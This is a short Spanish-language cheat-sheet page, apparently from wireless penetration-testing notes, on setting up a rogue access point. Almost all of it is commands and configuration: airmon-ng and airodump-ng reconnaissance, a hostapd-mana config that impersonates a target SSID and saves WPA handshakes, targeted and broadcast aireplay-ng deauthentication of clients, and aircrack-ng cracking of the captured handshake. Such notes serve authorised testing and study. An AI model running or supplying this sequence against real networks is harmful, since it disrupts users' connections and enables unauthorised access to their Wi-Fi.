Rogue access point

Habilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

Captura de paquetes para identificar el BSSID, ESSID y canal objetivo.

sudo airodump-ng <interface-mon>

Deshabilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info

Creación de archivo de configuración de hostapd-mana.

hostapd-mana.conf

interface=<interface>
ssid=<ssid>
channel=<channel>
hw_mode=g
ieee80211n=1
# WPA=1, WPA2=2, WPA & WPA2=3
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=<any-password>
# WPA1
wpa_pairwise=TKIP CCMP
# WPA2
rsn_pairwise=TKIP CCMP 
mana_wpaout=/<path>/output.hccapx

Inicio de rogue access points.

sudo hostapd-mana hostapd-mana.conf

Desautenticación de cliente(s).

# Desautenticación dirigida
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID> -c <client-mac-address>

# Desautenticación broadcast
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID>

Cracking con Aircrack-ng.

aircrack-ng output.hccapx -e <ESSID> -w <path-wordlist>

AnteriorWPS SiguienteConexión de red manual

Última actualización hace 3 años